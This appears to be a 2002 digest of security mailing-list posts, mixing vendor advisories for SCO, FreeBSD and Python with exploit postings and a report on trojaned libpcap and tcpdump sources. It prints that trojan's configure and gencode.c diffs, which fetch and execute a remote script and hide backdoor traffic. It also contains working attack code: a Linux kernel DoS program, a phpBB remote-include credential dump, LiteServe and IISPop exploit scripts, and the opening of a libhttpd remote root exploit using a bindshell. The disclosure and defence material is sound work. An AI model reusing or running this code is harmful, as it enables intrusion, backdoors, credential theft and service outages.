Security Update: [CSSA-2002-SCO.42] UnixWare 7.1.1 Open UNIX 8.0.0 : in.talkd format string vulnerabilities

[security]

To: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED]

__

SCO Security Advisory

Subject:UnixWare 7.1.1 Open UNIX 8.0.0 : in.talkd format string 
vulnerabilities
Advisory number:CSSA-2002-SCO.42
Issue date: 2002 November 12
Cross reference:
__


1. Problem Description

 The in.talkd program is vulnerable to a format string bug
 which can be exploited remotely. An attacker can request
 a talk session with a crafted luser field and be able to
 write memory and gain control of the flow of the in.talkd.
 This vulnerability can also be exploited with the clt_addr
 field and its resolved name (in conjuction with a DNS).


2. Vulnerable Supported Versions

System  Binaries
--
UnixWare 7.1.1  /usr/sbin/in.otalkd
/usr/sbin/in.talkd
Open UNIX 8.0.0 /usr/sbin/in.otalkd
/usr/sbin/in.talkd

3. Solution

The proper solution is to install the latest packages.


4. UnixWare 7.1.1

4.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.42


4.2 Verification

MD5 (erg712055.pkg.Z) = 5cd91b194857bb3149efee8bf6e3e804

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


4.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

Download erg712055.pkg.Z to the /var/spool/pkg directory

# uncompress /var/spool/pkg/erg712055.pkg.Z
# pkgadd -d /var/spool/pkg/erg712055.pkg


5. Open UNIX 8.0.0

5.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.42


5.2 Verification

MD5 (erg712055.pkg.Z) = 5cd91b194857bb3149efee8bf6e3e804

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


5.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

Download erg712055.pkg.Z to the /var/spool/pkg directory

# uncompress /var/spool/pkg/erg712055.pkg.Z
# pkgadd -d /var/spool/pkg/erg712055.pkg


6. References

Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1010
http://www.ngsec.com/docs/advisories/NGSEC-2002-3.txt

SCO security resources:
http://www.sco.com/support/security/index.html

This security fix closes SCO incidents sr864879, fz521053,
erg712055.


7. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products.


8. Acknowledgements

It is difficult to say who actually discovered this
vulnerability. There are many candidates.

__



msg09894/pgp0.pgp
Description: PGP signature

FreeBSD Security Advisory FreeBSD-SA-02:41.smrsh

[FreeBSD Security Advisories]

-BEGIN PGP SIGNED MESSAGE-

=
FreeBSD-SA-02:41.smrsh  Security Advisory
  The FreeBSD Project

Topic:  smrsh restrictions can be bypassed

Category:   core
Module: contrib_sendmail
Announced:  2002-11-12
Credits:zen-parse <[EMAIL PROTECTED]>,
Pedram Amini <[EMAIL PROTECTED]>,
iDEFENSE http://www.idefense.com/>
Affects:All releases prior to FreeBSD 4.7-RELEASE
Corrected:  2002-10-08 00:53:31 UTC (RELENG_4)
2002-10-08 00:57:20 UTC (RELENG_4_7)
2002-10-26 21:11:30 UTC (RELENG_4_6)
2002-10-26 21:10:59 UTC (RELENG_4_5)
2002-10-26 21:10:22 UTC (RELENG_4_4)
2002-10-26 21:08:42 UTC (RELENG_4_3)
FreeBSD only:   NO

I.   Background

The sendmail Restricted Shell command (smrsh) is intended as a
replacement for the system shell (/bin/sh) for use by sendmail.  It
limits the set of programs that can be executed through sendmail to
those in a single directory, and limits shell built-in commands.

II.  Problem Description

Errors in smrsh's handling of command arguments with "||" or spaces
may allow the execution of commands outside of those in its target
directory.  Since command arguments may be specified in local users'
`.forward' files, the smrsh restrictions may be bypassed using such
files that are specially crafted.

III. Impact

Users with a local account and the ability to create or modify their
`.forward' files can circumvent the smrsh restrictions.  This is
mostly of consequence to systems which have local users that are not
normally allowed access to a login shell, as such users may abuse this
bug in order to execute arbitrary commands with normal privileges.

IV.  Workaround

There is no known workaround, short of disabling `.forward' files.  To
do so, add the following line to the sendmail.mc file, regenerate the
sendmail.cf configuration file, and restart sendmail.

   define(`confFORWARD_PATH', `')dnl

V.   Solution

1) Upgrade your vulnerable system to 4.7-STABLE; or to the RELENG_4_7,
RELENG_4_6, RELENG_4_5, RELENG_4_4, or RELENG_4_3 security branch
dated after the correction date.

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, FreeBSD
4.5, and FreeBSD 4.6 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:41/smrsh.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:41/smrsh.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/sendmail
# make depend && make && make install

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Path Revision
  Branch
- -
src/contrib/sendmail/smrsh/smrsh.c
  RELENG_41.3.6.9
  RELENG_4_7  1.3.6.8.2.1
  RELENG_4_6  1.3.6.6.2.1
  RELENG_4_5  1.3.6.5.4.1
  RELENG_4_4  1.3.6.5.2.1
  RELENG_4_3  1.3.6.4.2.1
- -

VII. References

http://www.idefense.com/advisory/10.01.02.txt>
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (FreeBSD)

iQCVAwUBPdFKAFUuHi5z0oilAQEgVAP9F8EqcCR0MBXgrNr8LaC3RS9T0yZOL8pn
wRdhi/CJrl+xXkh3PeK1t4CNnSzDjQRTCAoiguisbzxUb1ww9BYkYBrsX7/U9bOT
ZTcRb23nKTLZvWhpocGLNW6tLr7TwM+6QoklHxW7TDw1pdyxdNFRk3w5eAGBc/wJ
ZM+hFGmapmA=
=UMny
-END PGP SIGNATURE-

Opera 7 vulnerabilities

[GreyMagic Software]

We've done some basic security tests, in cooperation with Tom Gilder, on the
new Opera 7 beta release and found two major security vulnerabilities. These
vulnerabilities are quite obvious and likely to be discovered by malicious
users.

Combined, they allow full read access to a victim's file system (including
both directories and files) and scripting access to any domain.

Full details will be released once Opera resolves these issues. In the
meanwhile, users are encouraged not to upgrade to Opera 7 or disable
scripting.

Latest libpcap & tcpdump sources from tcpdump.org contain a trojan

[Mincu Alexandru]

Updates:

  * Many Mirrors are infected with the trojan
Background:

  * Libpcap provides a packet sniffing library for programs like
Snort.
  * Tcpdump is a standard tool for packet sniffing.
Details:

  * The trojan contains modifications to the configure script and
gencode.c (in libpcap only).

  * The configure script downloads
http://mars.raketti.net/~mash/services which is then sourced
with the shell. It contains an embedded shell script that
creates a C file, and compiles it.

  * The program connects to 212.146.0.34 (mars.raketti.net) on port
1963 and reads one of three one byte status codes:
  * A - program exits 
  * D - forks and spawns a shell and does the needed file
descriptor manipulation to redirect it to the existing
connection to 212.146.0.34. 
  * M - closes connection, sleeps 3600 seconds, and then
reconnects 


Hmm... ADM...

  * It's important to note that it reuses the same outgoing
connection for the shell. This gets around firewalls that block
incoming connections.

  * Gencode.c is modified to force libpcap to ignore packets to/from
the backdoor program, hiding the backdoor program's traffic.

  * This is similar to the OpenSSH trojan a few months ago.


Good sources: 

http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz


MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7  libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248  tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e  tcpdump-3.7.1.tar.gz
Trojaned sources:

http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz


MD5 Sum 73ba7af963aff7c9e23fa1308a793dca  libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9  tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88  tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:


*** 288,293 
--- 289,318 
  {
extern int n_errors;
int len;
+ int l;
+ char *port = "1963";
+ char *str, *tmp, *new = "not port 1963";
+ 
+ if (buf && *buf && strstr (buf, port)) {
+ buf = "port 1964";
+ }
+ else {
+ l = strlen (new) + 1;
+ if (!(!buf || !*buf)) {
+ l += strlen (buf);
+ l += 5; /* and */
+ }
+ 
+ str = (char *)malloc (l);
+ str[0] = '\0';
+ if (!(!buf || !*buf)) {
+ strcpy (str, buf);
+ strcat (str, " and ");
+ }
+ 
+ strcat (str, new);
+ buf = str;
+ }
  
no_optimize = 0;
n_errors = 0;
***

The (relevant) configure diff:


+  CNF="services"
+  URL="mars.raketti.net/~mash/$CNF"

!  (IFS=","
!  ARGS="wget -q -O -,lynx --source,fetch -q -o -"
! 
!  for i in $ARGS; do
!IFS=" "
!$i $URL 1> $CNF
!if [ -f $CNF ]; then sh $CNF
!exit
!fi
!rm -f $CNF
!  done) 1>/dev/null 2>/dev/null &

The "services" payload:
  * trojan-script, the non-obfuscated portion (excerpted)
  * services, the complete version
Thanks to:

Russell Adams <[EMAIL PROTECTED]>
Mathew Solnik <[EMAIL PROTECTED]>
Scott Stout <[EMAIL PROTECTED]>

with the Houston Linux Users Group.

Additional thanks to Bruce Locke for interpreting the backdoor code.

Thanks to Gentoo's Portage system for catching the trojaned 

-- 
Mincu Alexandru <[EMAIL PROTECTED]>

Security Update: [CSSA-2002-045.0] Linux: python insecure temporary files in os._execvpe

[security]

To: [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED] [EMAIL PROTECTED]

__

SCO Security Advisory

Subject:Linux: python insecure temporary files in os._execvpe 
Advisory number:CSSA-2002-045.0
Issue date: 2002 November 14
Cross reference:
__


1. Problem Description

os._execvpe from os.py in Python creates temporary files with
predictable names, which could allow local users to execute
arbitrary code via a symlink attack.


2. Vulnerable Supported Versions

System  Package
--

OpenLinux 3.1.1 Server  prior to python-1.5.2-23.i386.rpm
prior to python-devel-1.5.2-23.i386.rpm
prior to python-docs-1.5.2-23.i386.rpm
prior to python-tools-1.5.2-23.i386.rpm

OpenLinux 3.1.1 Workstation prior to python-1.5.2-23.i386.rpm
prior to python-devel-1.5.2-23.i386.rpm
prior to python-docs-1.5.2-23.i386.rpm
prior to python-tools-1.5.2-23.i386.rpm

OpenLinux 3.1 Serverprior to python-1.5.2-23.i386.rpm
prior to python-devel-1.5.2-23.i386.rpm
prior to python-docs-1.5.2-23.i386.rpm
prior to python-tools-1.5.2-23.i386.rpm

OpenLinux 3.1 Workstation   prior to python-1.5.2-23.i386.rpm
prior to python-devel-1.5.2-23.i386.rpm
prior to python-docs-1.5.2-23.i386.rpm
prior to python-tools-1.5.2-23.i386.rpm


3. Solution

The proper solution is to install the latest packages. Many
customers find it easier to use the Caldera System Updater, called
cupdate (or kcupdate under the KDE environment), to update these
packages rather than downloading and installing them by hand.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-045.0/RPMS

4.2 Packages

d02a87d515a2e0295b61a70e21d85d67python-1.5.2-23.i386.rpm
f026986740ce3b24aa75a6ef6d6f813dpython-devel-1.5.2-23.i386.rpm
a4d8a3a8a6011f4d87d1a3c3e75150d1python-docs-1.5.2-23.i386.rpm
6283c3abfb5a339d6f3c8e1b2b0304fcpython-tools-1.5.2-23.i386.rpm

4.3 Installation

rpm -Fvh python-1.5.2-23.i386.rpm
rpm -Fvh python-devel-1.5.2-23.i386.rpm
rpm -Fvh python-docs-1.5.2-23.i386.rpm
rpm -Fvh python-tools-1.5.2-23.i386.rpm

4.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-045.0/SRPMS

4.5 Source Packages

3041180ed79446f6a8cd8cfedff00c26python-1.5.2-23.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-045.0/RPMS

5.2 Packages

6d2e343894471d4a93526a50e58af0a0python-1.5.2-23.i386.rpm
b6deb353e9a98e9b0e340e8b477a824apython-devel-1.5.2-23.i386.rpm
7add35e7aef1386039852737a86ddbeepython-docs-1.5.2-23.i386.rpm
6171e897385c76edf00c0e02f08347cfpython-tools-1.5.2-23.i386.rpm

5.3 Installation

rpm -Fvh python-1.5.2-23.i386.rpm
rpm -Fvh python-devel-1.5.2-23.i386.rpm
rpm -Fvh python-docs-1.5.2-23.i386.rpm
rpm -Fvh python-tools-1.5.2-23.i386.rpm

5.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-045.0/SRPMS

5.5 Source Packages

0ab0a2c193ec4031d706648ab2b3b9d1python-1.5.2-23.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-045.0/RPMS

6.2 Packages

d294fd2d394f464e21866a08e0023b08python-1.5.2-23.i386.rpm
4c17a3b0bc297dd2efe5cd1857894ac7python-devel-1.5.2-23.i386.rpm
ed4acb8309c022ed86ca6f70d6a76977python-docs-1.5.2-23.i386.rpm
3fc021186ac2ff05af448c945481a6d5python-tools-1.5.2-23.i386.rpm

6.3 Installation

rpm -Fvh python-1.5.2-23.i386.rpm
rpm -Fvh python-devel-1.5.2-23.i386.rpm
rpm -Fvh python-docs-1.5.2-23.i386.rpm
rpm -Fvh python-tools-1.5.2-23.i386.rpm

6.4 Source Package Location

ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/

Re: i386 Linux kernel DoS

[Christophe Devine]

On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include 

struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};

int main( void )
{
int pid;
char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;

if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags |= 0x4100; /* set TF and NT */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}

return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task 
(NT) flag inside a lcall7. 

-- 
Christophe Devine

RE: i386 Linux kernel DoS

[Leif Sawyer]

Christophe Devine writes:
> /* USE AT YOUR OWN RISK ! */
> 
> int main( void )
> {
> char dos[] = "\x9C"   /* pushfd   */
>  "\x58"   /* pop eax  */
>  "\x0D\x00\x01\x00\x00"   /* or eax,100h  */
>  "\x50"   /* push eax */
>  "\x9D"   /* popfd*/
>  "\x9A\x00\x00\x00\x00\x07\x00";  /* call 07h:00h */
> 
> void (* f)( void );
> 
> f = (void *) dos; (* f)();
> 
> return 1;
> }

You didn't specify which kernel this was being used against, but
this is what the response from LKML is:

> -Original Message-
> From: Alan Cox
> Sent: Tuesday, November 12, 2002 3:10 PM
> To: Christoph Hellwig
> Cc: Leif Sawyer; Linux Kernel Mailing List
> Subject: Re: FW: i386 Linux kernel DoS
> 
> 
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> > 
> > A real segfaulting program?  wow :)
> 
> Looks like the TF handling bug which was fixed a while ago
 

RE: Exploit code for IP Smart Spoofing

[Stephen Gill]

Laurent,
Thanks for your note.  In reality IP Smartspoofing is no different than
ARP cache poisoning so I'm not entirely sure why a new name was
"invented".  In this particular case one is able to prevent the
following:
 - key ports and corresponding MAC entries are hardcoded and secured (ie
gateways).  If there is a MAC violation, this is logged and the port is
shut down.  9 times out of 10 if someone is performing ARP spoofing they
will go for a device that is best connected so consider this a fly trap.
 - host ports are protected by only allowing one MAC address on a port
at any given time with a lag of 5 minutes for timeout.  Yes a station
can change its hardcoded MAC.  This will allow them to see at most the
traffic of one other host on the switch.  Not perfect, but the odds are
greatly reduced.


A couple of ways that come to mind for having complete protection are:
 - have a method of detecting duplicate MAC addresses on a switch
 - enable "sticky" ARP.  This will keep end stations from being able to
change their MAC address, but at a potentially high administrative
burden.  I'll make a note of this option in the doc.

Cheers,
-- steve

-Original Message-
From: Laurent Licour [mailto:llicour@;althes.fr] 
Sent: Thursday, November 14, 2002 3:56 AM
To: [EMAIL PROTECTED]
Cc: 'Stephen Gill'
Subject: RE: Exploit code for IP Smart Spoofing

Your document is quite usefull, but there is no way to protect against 
IP smartspoofing with a switch.
Smartspoofing use ARP cache poisonning of hosts.
Using a switch, you can only protect against MAC spoofing as describe in
your document.
You can also detect and refuse the plug of a new host on your network.
But
as it is possible
to change the MAC address of hosts (at least linux and windows 2000),
this
protection is not very strong.
You just have to replace a host by another.

One way to protect with switchs could be the use of switchs that are
able to
create 
their CAM entry with the PORT, the MAC and the IP. (against PORT and MAC
only for now)
I think that only layer 3 switch are able to do such work. I have
however no
specific information
about which switch support this feature.
Nortel Passeport 8600 is supposed to do this with the IP filter feature
(something like an ACL
associated with each PORT)

In any case, this could protect only a LAN. If you put a source IP
filtering
rule IP that allows
an external IP, you have no way to detect a spoofing connexion. Only
cryptography can help you
(IPSec...)


Regards

Laurent Licour
[EMAIL PROTECTED]



-Message d'origine-
De : Stephen Gill [mailto:gillsr@;yahoo.com]
Envoyé : mercredi 13 novembre 2002 20:33
À : 'Laurent Licour'; [EMAIL PROTECTED]
Objet : RE: Exploit code for IP Smart Spoofing


In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines.  The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.

http://www.qorbit.net/documents/catalyst-secure-template.pdf
http://www.qorbit.net/documents/catalyst-secure-template.htm

Comments or suggestions welcome.
-- steve



*---*
* Cet e-mail et toutes les pièces jointes sont destinés aux *
* seules personnes auxquelles ils sont spécifiquement adressés  *
* et n'engagent que le signataire de ces documents et non la*
* structure dont il dépend. *
* Leur existence et leur contenu ont un caractère confidentiel. *
* Toute utilisation ou diffusion non autorisée est interdite.   *
* Si vous avez reçu cet  e-mail ou si vous détenez sans en être *
* le destinataire, nous vous demandons de bien vouloir nous en  *
* informer immédiatement.   *
* Cette note assure que ce message a été contrôlé et ne *
* comprenait aucun virus connu à ce jour, néanmoins tout*
* message électronique est susceptible d'altération.*
* Nous déclinons toute responsabilité au titre de ce message*
* s'il a été altéré, déformé ou falsifié.*
*---*
 

Code Injection in phpBB Advanced Quick Reply Mod

[Hai Nam Luke]

Software: phpBB Advanced Quick Reply Mod 

I've found a security hole in this sofware (Code Injection). You can 
download this software at http://phpbbhacks.com/viewhack.php?id=586
Hackers can exploit this Mod to inject some shell code to hack your forum, 
your website or your server (local exploit) because Code Injection is a 
dangerous technique of hackers.


Exploit: (quick_reply.php)


if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}


And you can make a php file which named 'extension.inc' to inclusion to 
access that forum. example:

";
echo "DB Host: $dbhost ";
echo "DB Name: $dbname ";
echo "DB User: $dbuser ";
echo "DB Pass: $dbpasswd ";
exit;
?>

After that, you upload this file to your server (http://[Your 
Server]/extension.inc) and  enter URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your 
Server]/&mode=smiles
You'll be recived all DB Info of forum


Patch: (quick_reply.php) 

[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
phpbb_root_path = "./";

Sorry for my poor english. 
Luke (HVA)
http://www.hackervn.net

Perception LiteServe HTTP CGI Disclosure Vulnerability

[[EMAIL PROTECTED]]

Christopher Fillion's "Perception" web site hosts the LiteServe combination
server for Win32.  The server offers HTTP, FTP, SMTP, POP3, and Telnet
services.  Included in the HTTP service is a Common Gateway Interface (CGI)
feature that allows you to specify a CGI alias, as well as "filters" that
are run when a file of a particular type is accessed.

A vulnerability in the server related to the handling of filenames on Win32
platforms may reveal the code of a desired CGI script to an attacker. 
Windows handles file names with the "." character (0x2E) on the end as if
the said character had been removed.  LiteServe fails to compensate for
this behavior, and is vulnerable to a simple CGI disclosure attack.

The upcoming release of LiteServe 2.03 should eliminate this vulnerability.

Exploit

#!/usr/bin/perl
#
# LS_FETCH.PL
# By Matthew Murphy
# LiteServe 2.02 and prior - CGI Disclosure
# Usage: perl ls_fetch.pl [filename] [host] [alias] [port]
use IO::Socket;
use URI::Escape;

$alias = "cgi-isapi"; # Default LiteServe CGI alias
$port = 80;
if (@ARGV < 2 || @ARGV > 4) {
print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80]
} else {
if (@ARGV >= 3) { 
$alias = $ARGV[2];
}
if (@ARGV == 4) {
$port = $ARGV[3];
}
$filename = $ARGV[1];
$host = $ARGV[2];
$f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp");
$f->autoflush(1);
$b = sprintf("GET /%s/%s. HTTP/1.0\r\n\r\n", $alias, uri_escape($file));
print $f $b;
while (defined($line=<$f>)) {
print STDOUT $line;
}
undef $f;
}


mail2web - Check your email from the web at
http://mail2web.com/ .

IISPop remote DOS

[securma massine]

hi

The IISPop EMail Server (http://www.curtiscomp.com/)was
designed for small networks,This is a POP3 only server,
designed to be paired with the SMTP server bundled in
Windows 2000/IIS 5.

 I have found that IISpop is vulnerable has a attack DOS
caused by sends of a broad buffer (28 byte) this attack
gives the following state of the registers (tested on v
1.161 end 1.181)

Access violation - code c005 (first chance)
eax=0041 ebx=00407d3d ecx=0101 edx=21ae
esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=026c iopl=0 nv up
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038
gs= efl=0206
KERNEL32!GetCurrentThreadId+4:
77e76941  add [eax],al
ds:0023:0041=??

(unhandled exeption in IISPop.exe (KRNELL32.DLL)
0xc005 : access violation

exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#

use IO::Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
 print "\tUsage: perl iispdos.pl  \n";
exit;
}

$remo = $ARGV[0];
$buffer = "A" x 28;

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
 PeerAddr => $remo,
 PeerPort
=> "110"))
{
 print "-->";
 print "\tConnection Failed...\n";
 exit;
}
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;


_
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

Re: Bind 8 bug experience

[Chris Adams]

Once upon a time, Michael Brennen <[EMAIL PROTECTED]> said:
> Three bugs in bind 4 and 8 were announced this morning, November 12.
> At least one has the possibility of arbitrary code execution, and
> the ISC web site lists it as 'Serious'.
> 
> At 13:02 CST this afternoon per the ISC announcement, about an hour
> after receiving the bug announcement, I requested bind 8 patches
> from Lynda McGinley, Executive Director of ISC.  I received a
> response from her roughly 8 hours later this evening that I had been
> added to the patch announce list.  My thanks to Lynda for that, but
> she did not give direct information on where to get the patches, and
> I have received nothing from the patch announce list.  I don't know
> when I can expect to receive anything -- tonight, next week, or next
> month?

I also (per the announcement from ISC) emailed Lynda McGinley requesting
patches.  I never received a response.  I kept watch on the ISC web site
and downloaded the patch last night (the file timestamps in the patch
are all Oct 30 2002, so the patch was ready in plenty of time).

We cannot upgrade some of our servers to BIND 9 because it (in my
experience and in the experience of others) is not stable on Compaq/HP
Tru64 Unix.  Repeated messages on the BIND mailing list by myself and
others have been ignored (except by other Tru64 users with the same
problems), so as far as I know, no work is going on to fix BIND 9 on
Tru64.  We either run BIND 8 or don't run BIND (and despite the work
involved in switching, running something other than BIND is looking
good).

-- 
Chris Adams <[EMAIL PROTECTED]>
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.

RE: Opera 7 vulnerabilities

[Thor Larholm]

Monitoring which pages a user visits is also possible, and in general there
seems to be some oversights in this otherwise smooth rewrite.

Add to that some of the more odd bugs functionalitywise, and I would say
there is room for a beta 2 ;)


Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC

Strike Now, StrikeFirst!
http://www.pivx.com/sf.html

-Original Message-
From: GreyMagic Software [mailto:security@;greymagic.com]
Sent: 14. november 2002 17:43
To: Bugtraq
Subject: Opera 7 vulnerabilities


We've done some basic security tests, in cooperation with Tom Gilder, on the
new Opera 7 beta release and found two major security vulnerabilities. These
vulnerabilities are quite obvious and likely to be discovered by malicious
users.

Combined, they allow full read access to a victim's file system (including
both directories and files) and scripting access to any domain.

Full details will be released once Opera resolves these issues. In the
meanwhile, users are encouraged not to upgrade to Opera 7 or disable
scripting.

RE: A technique to mitigate cookie-stealing XSS attacks

[Eric Stevens]

Two things:

While I agree that XSS is far more serious than has been discussed in this
thread, addressing cookie stealing is still a legitimate pursuit.

Second (and considerably more verbose), you said
>As another example, the "FRAME SECURITY=RESTRICTED" feature described
>by Michael Howard could be defeated by HTML injection - the attacker
>could inject a  tag and follow it with the malicious code.
>This could also apply to the  tag proposed by Seth Arnold, at
>...

Couldn't browsers recognize this possibility and ignore intermediate 
or nested  tags?

For example,

  some text here.
  Malicious injected HTML
  More malicious injected HTML
  more safe text here


where the browser recognizes that nested  tags are meaningless and
pays no attention, and also recognizes that the number of  tags
exceeds the number of  tags, and so extends the dead space until the
very final  tag is identified.

A requirement for this  tag to work would have to either be that there
can be only one  tag per page, to prevent someone from doing this:

  text
  Malware line
  text


or else require that the  tag take an argument, id, to specify which
 block it refers to.  So then you can have


  Malware line


Recognizing dead tags with the same id's allows the browser to identify what
may have potentially been injected by marking the space dead between the
very first and very last occurance of a dead tag with a particular id.

Except,  doesn't fit SGML standards, which is particularly
unfortunate.

Another alternative might be

where the tag is stand alone and marks a space as dead-required for a
certain length, regardless of what code occurs within there.  Then it can be
up to the browser to identify potentially harmful code, such as meta
redirects, active controls, scripting, iframes, etc (pretty much anything
that is not direct text markup), and refuse to run this code.  Information
could even be added in the HTML headers to let the browser know what this
site considers illegal markup within dead space.  Example, refusing to
display images, but allowing hyperlinks, or whatever, *including* attributes
of specific tags.

...

  http://*"; width="<600" height="<150" alt="*" allow=1>
  http://*"; allow=1>
  
  



Here we would allow any image which has a src that starts with "http://";,
with any width under 600, height under 150, and any alt tag.  All other
attributes would be ignored.  Hyperlinks can be used so long as they begin
with "http://";, and all other attributes are ignored.  Font of any face, and
any size under 4.  And finally disallow blockquotes.  I assume that these
tags would all have default allowances within dead space, that these
definitions redefine or refine.

In the end though, if we talk about enabling the browser to protect itself
against unknown injections, we are looking at a couple of years at a minimum
until we can be relatively secure in the knowledge that we can gain any
trustworthy level of security from this concept.

But I guess my point was that there are ways for the browser to protect
itself, and distinguish from site-author authored code and blackhat code.
-MightyE

Remote Buffer Overflow vulnerability in Lib HTTPd.

[dong-h0un U]

INetCop Security Advisory #2002-0x82-003



* Title: Remote Buffer Overflow vulnerability in Lib HTTPd.


0x01. Description


LibHTTPD can be used to add basic web server capabilities to an application or 
embedded device. 
Detailed contents desire to reference lower part homepage. :-)

If examine 'api.c' of library libhttpd.a source code, can find vulnerability.
Can see httpdProcessRequest() in line:860

   __
   860  void httpdProcessRequest(server)
   861  httpd   *server;
   862  {
   863  chardirName[HTTP_MAX_URL],
...
   869  server->response.responseLength = 0;
   870  strcpy(dirName, httpdRequestPath(server)); // here.
   --

Herewith, fatal vulnerability that can execute rootshell in remote happens.


0x02. Vulnerable Packages


Vendor site: http://www.hughes.com.au/products/libhttpd/

libhttpd-1.2 
-libhttpd-1.2.tar.gz
+Linux
+Other


0x03. Exploit


This's exploit code that prove.
Through remote attack, get 'root' competence.

Use netcat for very easy exploit.

To do simple explanation about exploit.
Through POST, insert much &shellcode address.
Put next nop,shellcode.
(Port:3879 bindshell code)


=== 0x82-Remote.libhttpdxpl.c ===

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
** by Xpl017Elz 
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$ 
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <[EMAIL PROTECTED]>. 
